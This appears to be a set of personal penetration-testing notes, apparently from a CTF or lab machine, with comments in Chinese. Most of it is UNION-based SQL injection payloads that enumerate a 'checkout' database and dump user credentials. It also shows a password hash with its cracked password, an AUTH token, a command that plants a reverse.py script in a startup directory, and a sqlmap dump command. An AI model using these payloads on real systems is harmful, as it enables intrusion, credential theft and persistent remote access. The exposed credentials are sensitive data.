SLQ Injection

timmy'union SELECT 1,group_concat(table_name, 0x0a),3 FROM information_schema.tables-- -

查出當前表名

timmy'union SELECT 1,concat(schema_name),3 FROM information_schema.schemata limit 1,1 -- -

查出當前表名

timmy'union SELECT 1,group_concat(schema_name),3 FROM information_schema.schemata -- -

查出當前表名

timmy'union SELECT 1,(select group_concat(schema_name) from information_schema.schemata),3 -- -

checkout

查出所有欄位名稱

{"timmy'union SELECT 4,group_concat(COLUMN_NAME),9999 from information_schema.columns -- -":"1"}

根據表明查出所有欄位名稱

timmy'union SELECT 4,group_concat(COLUMN_NAME),9999 from information_schema.columns where table_schema like 'checkout'-- -

查出當前表內的欄位名稱

timmy'union SELECT 1,(select group_concat(TABLE_NAME,':',COLUMN_NAME) from information_schema.columns where table_schema like 'checkout'),3 -- -

user:id,user:username,user:password

product:id,product:code,product:price

查出user表的的username以password內容

timmy'union SELECT 1,(select group_concat(username,password) from user),3 -- -

james_mason:fc895d4eddc2fc12f995e18c865cf273

Soleil101

mkdir -p -m 777 /opt/scripts_review/profile_default/startup && cp /tmp/reverse.py /opt/scripts_review/profile_default/startup/reverse.py && chmod +x /opt/scripts_review/profile_default/startup/reverse.py

AUTH F2WHqJUz2WEz=Gqq

SQLMAP指定請求範例，指定檢查union漏洞，指令columns只有三個

sqlmap -r req --technique=U --union-col 3 --batch --dump

scp root@www.runoob.com:/home/root/others/music /home/space/music/1.mp3